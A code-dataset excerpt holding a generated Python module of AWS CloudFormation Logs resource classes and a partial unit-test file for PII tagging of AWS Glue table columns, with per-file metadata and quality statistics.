hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | 
qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
07e7231c23fc0949a2194bbec01af79d77f01473 | 18,299 | py | Python | cottonformation/res/logs.py | MacHu-GWU/cottonformation-project | 23e28c08cfb5a7cc0db6dbfdb1d7e1585c773f3b | [
"BSD-2-Clause"
] | 5 | 2021-07-22T03:45:59.000Z | 2021-12-17T21:07:14.000Z | cottonformation/res/logs.py | MacHu-GWU/cottonformation-project | 23e28c08cfb5a7cc0db6dbfdb1d7e1585c773f3b | [
"BSD-2-Clause"
] | 1 | 2021-06-25T18:01:31.000Z | 2021-06-25T18:01:31.000Z | cottonformation/res/logs.py | MacHu-GWU/cottonformation-project | 23e28c08cfb5a7cc0db6dbfdb1d7e1585c773f3b | [
"BSD-2-Clause"
] | 2 | 2021-06-27T03:08:21.000Z | 2021-06-28T22:15:51.000Z | # -*- coding: utf-8 -*-
"""
This module
"""
import attr
import typing
from ..core.model import (
Property, Resource, Tag, GetAtt, TypeHint, TypeCheck,
)
from ..core.constant import AttrMeta
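# Naming convention used throughout this generated module (an inference from
# the validators below, not a statement from the library docs): ``rp_``
# attributes are required properties validated with a plain ``instance_of``
# check, while ``p_`` attributes are optional and wrapped in
# ``attr.validators.optional``.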
#--- Property declaration ---
@attr.s
class PropMetricFilterMetricTransformation(Property):
"""
AWS Object Type = "AWS::Logs::MetricFilter.MetricTransformation"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-logs-metricfilter-metrictransformation.html
Property Document:
- ``rp_MetricName``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-logs-metricfilter-metrictransformation.html#cfn-cwl-metricfilter-metrictransformation-metricname
- ``rp_MetricNamespace``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-logs-metricfilter-metrictransformation.html#cfn-cwl-metricfilter-metrictransformation-metricnamespace
- ``rp_MetricValue``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-logs-metricfilter-metrictransformation.html#cfn-cwl-metricfilter-metrictransformation-metricvalue
- ``p_DefaultValue``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-logs-metricfilter-metrictransformation.html#cfn-cwl-metricfilter-metrictransformation-defaultvalue
"""
AWS_OBJECT_TYPE = "AWS::Logs::MetricFilter.MetricTransformation"
rp_MetricName: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "MetricName"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-logs-metricfilter-metrictransformation.html#cfn-cwl-metricfilter-metrictransformation-metricname"""
rp_MetricNamespace: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "MetricNamespace"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-logs-metricfilter-metrictransformation.html#cfn-cwl-metricfilter-metrictransformation-metricnamespace"""
rp_MetricValue: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "MetricValue"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-logs-metricfilter-metrictransformation.html#cfn-cwl-metricfilter-metrictransformation-metricvalue"""
p_DefaultValue: float = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(float)),
metadata={AttrMeta.PROPERTY_NAME: "DefaultValue"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-logs-metricfilter-metrictransformation.html#cfn-cwl-metricfilter-metrictransformation-defaultvalue"""
#--- Resource declaration ---
@attr.s
class MetricFilter(Resource):
"""
AWS Object Type = "AWS::Logs::MetricFilter"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-metricfilter.html
Property Document:
- ``rp_FilterPattern``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-metricfilter.html#cfn-cwl-metricfilter-filterpattern
- ``rp_LogGroupName``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-metricfilter.html#cfn-cwl-metricfilter-loggroupname
- ``rp_MetricTransformations``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-metricfilter.html#cfn-cwl-metricfilter-metrictransformations
"""
AWS_OBJECT_TYPE = "AWS::Logs::MetricFilter"
rp_FilterPattern: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "FilterPattern"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-metricfilter.html#cfn-cwl-metricfilter-filterpattern"""
rp_LogGroupName: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "LogGroupName"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-metricfilter.html#cfn-cwl-metricfilter-loggroupname"""
rp_MetricTransformations: typing.List[typing.Union['PropMetricFilterMetricTransformation', dict]] = attr.ib(
default=None,
converter=PropMetricFilterMetricTransformation.from_list,
validator=attr.validators.deep_iterable(member_validator=attr.validators.instance_of(PropMetricFilterMetricTransformation), iterable_validator=attr.validators.instance_of(list)),
metadata={AttrMeta.PROPERTY_NAME: "MetricTransformations"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-metricfilter.html#cfn-cwl-metricfilter-metrictransformations"""
@attr.s
class Destination(Resource):
"""
AWS Object Type = "AWS::Logs::Destination"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-destination.html
Property Document:
- ``rp_DestinationName``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-destination.html#cfn-logs-destination-destinationname
- ``rp_DestinationPolicy``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-destination.html#cfn-logs-destination-destinationpolicy
- ``rp_RoleArn``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-destination.html#cfn-logs-destination-rolearn
- ``rp_TargetArn``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-destination.html#cfn-logs-destination-targetarn
"""
AWS_OBJECT_TYPE = "AWS::Logs::Destination"
rp_DestinationName: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "DestinationName"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-destination.html#cfn-logs-destination-destinationname"""
rp_DestinationPolicy: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "DestinationPolicy"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-destination.html#cfn-logs-destination-destinationpolicy"""
rp_RoleArn: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "RoleArn"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-destination.html#cfn-logs-destination-rolearn"""
rp_TargetArn: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "TargetArn"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-destination.html#cfn-logs-destination-targetarn"""
@property
def rv_Arn(self) -> GetAtt:
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-destination.html#aws-resource-logs-destination-return-values"""
return GetAtt(resource=self, attr_name="Arn")
@attr.s
class LogGroup(Resource):
"""
AWS Object Type = "AWS::Logs::LogGroup"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-loggroup.html
Property Document:
- ``p_KmsKeyId``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-loggroup.html#cfn-logs-loggroup-kmskeyid
- ``p_LogGroupName``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-loggroup.html#cfn-logs-loggroup-loggroupname
- ``p_RetentionInDays``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-loggroup.html#cfn-logs-loggroup-retentionindays
- ``p_Tags``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-loggroup.html#cfn-logs-loggroup-tags
"""
AWS_OBJECT_TYPE = "AWS::Logs::LogGroup"
p_KmsKeyId: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(TypeCheck.intrinsic_str_type)),
metadata={AttrMeta.PROPERTY_NAME: "KmsKeyId"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-loggroup.html#cfn-logs-loggroup-kmskeyid"""
p_LogGroupName: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(TypeCheck.intrinsic_str_type)),
metadata={AttrMeta.PROPERTY_NAME: "LogGroupName"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-loggroup.html#cfn-logs-loggroup-loggroupname"""
p_RetentionInDays: int = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(int)),
metadata={AttrMeta.PROPERTY_NAME: "RetentionInDays"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-loggroup.html#cfn-logs-loggroup-retentionindays"""
p_Tags: typing.List[typing.Union[Tag, dict]] = attr.ib(
default=None,
converter=Tag.from_list,
validator=attr.validators.optional(attr.validators.deep_iterable(member_validator=attr.validators.instance_of(Tag), iterable_validator=attr.validators.instance_of(list))),
metadata={AttrMeta.PROPERTY_NAME: "Tags"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-loggroup.html#cfn-logs-loggroup-tags"""
@property
def rv_Arn(self) -> GetAtt:
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-loggroup.html#aws-resource-logs-loggroup-return-values"""
return GetAtt(resource=self, attr_name="Arn")
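# Usage sketch (the logical id and the serialised form shown are assumptions):
#
#   log_group = LogGroup("AppLogGroup", p_LogGroupName="/my/app", p_RetentionInDays=30)
#   arn = log_group.rv_Arn  # a GetAtt intrinsic, roughly {"Fn::GetAtt": ["AppLogGroup", "Arn"]}
#
# which lets the log group's ARN be wired into other resources in the template.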
@attr.s
class ResourcePolicy(Resource):
"""
AWS Object Type = "AWS::Logs::ResourcePolicy"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-resourcepolicy.html
Property Document:
- ``rp_PolicyDocument``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-resourcepolicy.html#cfn-logs-resourcepolicy-policydocument
- ``rp_PolicyName``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-resourcepolicy.html#cfn-logs-resourcepolicy-policyname
"""
AWS_OBJECT_TYPE = "AWS::Logs::ResourcePolicy"
rp_PolicyDocument: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "PolicyDocument"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-resourcepolicy.html#cfn-logs-resourcepolicy-policydocument"""
rp_PolicyName: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "PolicyName"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-resourcepolicy.html#cfn-logs-resourcepolicy-policyname"""
@attr.s
class LogStream(Resource):
"""
AWS Object Type = "AWS::Logs::LogStream"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-logstream.html
Property Document:
- ``rp_LogGroupName``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-logstream.html#cfn-logs-logstream-loggroupname
- ``p_LogStreamName``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-logstream.html#cfn-logs-logstream-logstreamname
"""
AWS_OBJECT_TYPE = "AWS::Logs::LogStream"
rp_LogGroupName: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "LogGroupName"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-logstream.html#cfn-logs-logstream-loggroupname"""
p_LogStreamName: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(TypeCheck.intrinsic_str_type)),
metadata={AttrMeta.PROPERTY_NAME: "LogStreamName"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-logstream.html#cfn-logs-logstream-logstreamname"""
@attr.s
class SubscriptionFilter(Resource):
"""
AWS Object Type = "AWS::Logs::SubscriptionFilter"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-subscriptionfilter.html
Property Document:
- ``rp_DestinationArn``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-subscriptionfilter.html#cfn-cwl-subscriptionfilter-destinationarn
- ``rp_FilterPattern``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-subscriptionfilter.html#cfn-cwl-subscriptionfilter-filterpattern
- ``rp_LogGroupName``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-subscriptionfilter.html#cfn-cwl-subscriptionfilter-loggroupname
- ``p_RoleArn``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-subscriptionfilter.html#cfn-cwl-subscriptionfilter-rolearn
"""
AWS_OBJECT_TYPE = "AWS::Logs::SubscriptionFilter"
rp_DestinationArn: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "DestinationArn"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-subscriptionfilter.html#cfn-cwl-subscriptionfilter-destinationarn"""
rp_FilterPattern: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "FilterPattern"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-subscriptionfilter.html#cfn-cwl-subscriptionfilter-filterpattern"""
rp_LogGroupName: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "LogGroupName"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-subscriptionfilter.html#cfn-cwl-subscriptionfilter-loggroupname"""
p_RoleArn: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(TypeCheck.intrinsic_str_type)),
metadata={AttrMeta.PROPERTY_NAME: "RoleArn"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-subscriptionfilter.html#cfn-cwl-subscriptionfilter-rolearn"""
@attr.s
class QueryDefinition(Resource):
"""
AWS Object Type = "AWS::Logs::QueryDefinition"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-querydefinition.html
Property Document:
- ``rp_Name``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-querydefinition.html#cfn-logs-querydefinition-name
- ``rp_QueryString``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-querydefinition.html#cfn-logs-querydefinition-querystring
- ``p_LogGroupNames``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-querydefinition.html#cfn-logs-querydefinition-loggroupnames
"""
AWS_OBJECT_TYPE = "AWS::Logs::QueryDefinition"
rp_Name: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "Name"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-querydefinition.html#cfn-logs-querydefinition-name"""
rp_QueryString: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "QueryString"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-querydefinition.html#cfn-logs-querydefinition-querystring"""
p_LogGroupNames: typing.List[TypeHint.intrinsic_str] = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.deep_iterable(member_validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type), iterable_validator=attr.validators.instance_of(list))),
metadata={AttrMeta.PROPERTY_NAME: "LogGroupNames"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-querydefinition.html#cfn-logs-querydefinition-loggroupnames"""
@property
def rv_QueryDefinitionId(self) -> GetAtt:
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-logs-querydefinition.html#aws-resource-logs-querydefinition-return-values"""
return GetAtt(resource=self, attr_name="QueryDefinitionId")
| 53.349854 | 208 | 0.751735 | 2,041 | 18,299 | 6.638903 | 0.048016 | 0.037196 | 0.051144 | 0.079041 | 0.909594 | 0.907749 | 0.865683 | 0.858007 | 0.85476 | 0.852915 | 0 | 0.000062 | 0.113613 | 18,299 | 342 | 209 | 53.505848 | 0.835327 | 0.342259 | 0 | 0.438596 | 0 | 0 | 0.073261 | 0.028997 | 0 | 0 | 0 | 0 | 0 | 1 | 0.017544 | false | 0 | 0.023392 | 0 | 0.304094 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6af7d377552fc083a0f6814fc4fecde580ba5e35 | 11,532 | py | Python | tests/test_glue.py | dm03514/piicatcher | c9c30d2dbda4d8c3d0e0d48e66dc282a22503b54 | [
"Apache-2.0"
] | null | null | null | tests/test_glue.py | dm03514/piicatcher | c9c30d2dbda4d8c3d0e0d48e66dc282a22503b54 | [
"Apache-2.0"
] | 1 | 2020-12-18T05:01:38.000Z | 2020-12-18T05:01:38.000Z | tests/test_glue.py | grofers/piicatcher | 181d008ba0aea4d7101fa83ddc075e9106164106 | [
"Apache-2.0"
] | null | null | null | import datetime
import unittest
from dateutil.tz import tzlocal
from piicatcher.catalog.glue import GlueStore
from tests.test_models import MockExplorer
class PiiTable(unittest.TestCase):
def test_no_pii(self):
pii_table = GlueStore.get_pii_table(MockExplorer.get_no_pii_table())
self.assertEqual({}, pii_table)
def test_partial_pii(self):
pii_table = GlueStore.get_pii_table(MockExplorer.get_partial_pii_table())
self.assertEqual({"a": ["PiiTypes.PHONE"]}, pii_table)
def test_full_pii(self):
pii_table = GlueStore.get_pii_table(MockExplorer.get_full_pii_table())
self.assertEqual(
{"a": ["PiiTypes.PHONE"], "b": ["PiiTypes.ADDRESS", "PiiTypes.LOCATION"]},
pii_table,
)
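# Shape pinned down by the assertions above: GlueStore.get_pii_table maps each
# column name to a list of stringified PiiTypes (e.g. {"a": ["PiiTypes.PHONE"]}),
# and columns with no detected PII are simply absent from the mapping.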
class UpdateParameters(unittest.TestCase):
def test_empty_table(self):
columns = [
{"Name": "dispatching_base_num", "Type": "string"},
{"Name": "pickup_datetime", "Type": "string"},
{"Name": "dropoff_datetime", "Type": "string"},
{"Name": "pulocationid", "Type": "bigint"},
{"Name": "dolocationid", "Type": "bigint"},
{"Name": "sr_flag", "Type": "bigint"},
{"Name": "hvfhs_license_num", "Type": "string"},
]
updated, is_updated = GlueStore.update_column_parameters(columns, {})
self.assertFalse(is_updated)
self.assertEqual(columns, updated)
def test_for_update(self):
columns = [
{"Name": "locationid", "Type": "bigint"},
{"Name": "borough", "Type": "string"},
{"Name": "zone", "Type": "string"},
{"Name": "service_zone", "Type": "string"},
]
expected = [
{"Name": "locationid", "Type": "bigint"},
{
"Name": "borough",
"Type": "string",
"Parameters": {"PII": "PiiTypes.ADDRESS"},
},
{
"Name": "zone",
"Type": "string",
"Parameters": {"PII": "PiiTypes.ADDRESS"},
},
{
"Name": "service_zone",
"Type": "string",
"Parameters": {"PII": "PiiTypes.ADDRESS"},
},
]
pii_table = {
"borough": ["PiiTypes.ADDRESS"],
"zone": ["PiiTypes.ADDRESS"],
"service_zone": ["PiiTypes.ADDRESS"],
}
updated, is_updated = GlueStore.update_column_parameters(columns, pii_table)
self.assertTrue(is_updated)
self.assertEqual(expected, columns)
def test_param_no_update(self):
columns = [
{"Name": "locationid", "Type": "bigint", "Parameters": {"a": "b"}},
{"Name": "borough", "Type": "string"},
]
updated, is_updated = GlueStore.update_column_parameters(columns, {})
self.assertFalse(is_updated)
self.assertEqual(columns, updated)
def test_param_update(self):
columns = [
{"Name": "locationid", "Type": "bigint",},
{"Name": "borough", "Type": "string", "Parameters": {"a": "b"}},
]
pii_table = {
"borough": ["PiiTypes.ADDRESS"],
}
expected = [
{"Name": "locationid", "Type": "bigint"},
{
"Name": "borough",
"Type": "string",
"Parameters": {"a": "b", "PII": "PiiTypes.ADDRESS"},
},
]
updated, is_updated = GlueStore.update_column_parameters(columns, pii_table)
self.assertTrue(is_updated)
self.assertEqual(expected, columns)
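# Taken together, these cases exercise the behaviour of
# GlueStore.update_column_parameters: it merges the PII table into each
# column's "Parameters" dict under the key "PII", preserves unrelated
# parameters such as {"a": "b"}, and returns the column list along with a
# flag indicating whether anything actually changed.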
class TableParams(unittest.TestCase):
def test_update(self):
updated_columns = [
{"Name": "locationid", "Type": "bigint"},
{
"Name": "borough",
"Type": "string",
"Parameters": {"PII": "PiiTypes.ADDRESS"},
},
{
"Name": "zone",
"Type": "string",
"Parameters": {"PII": "PiiTypes.ADDRESS"},
},
{
"Name": "service_zone",
"Type": "string",
"Parameters": {"PII": "PiiTypes.ADDRESS"},
},
]
table_params = {
"Name": "csv_misc",
"DatabaseName": "taxidata",
"Owner": "owner",
"CreateTime": datetime.datetime(2019, 12, 9, 16, 12, 43, tzinfo=tzlocal()),
"UpdateTime": datetime.datetime(2019, 12, 9, 16, 12, 43, tzinfo=tzlocal()),
"LastAccessTime": datetime.datetime(
2019, 12, 9, 16, 12, 43, tzinfo=tzlocal()
),
"Retention": 0,
"StorageDescriptor": {
"Columns": [
{"Name": "locationid", "Type": "bigint"},
{"Name": "borough", "Type": "string"},
{"Name": "zone", "Type": "string"},
{"Name": "service_zone", "Type": "string"},
],
"Location": "s3://nyc-tlc/misc/",
"InputFormat": "org.apache.hadoop.mapred.TextInputFormat",
"OutputFormat": "org.apache.hadoop.hive.ql.io.HiveIgnoreKeyTextOutputFormat",
"Compressed": False,
"NumberOfBuckets": -1,
"SerdeInfo": {
"SerializationLibrary": "org.apache.hadoop.hive.serde2.lazy.LazySimpleSerDe",
"Parameters": {"field.delim": ","},
},
"BucketColumns": [],
"SortColumns": [],
"Parameters": {
"CrawlerSchemaDeserializerVersion": "1.0",
"CrawlerSchemaSerializerVersion": "1.0",
"UPDATED_BY_CRAWLER": "TaxiCrawler",
"areColumnsQuoted": "false",
"averageRecordSize": "36",
"classification": "csv",
"columnsOrdered": "true",
"compressionType": "none",
"delimiter": ",",
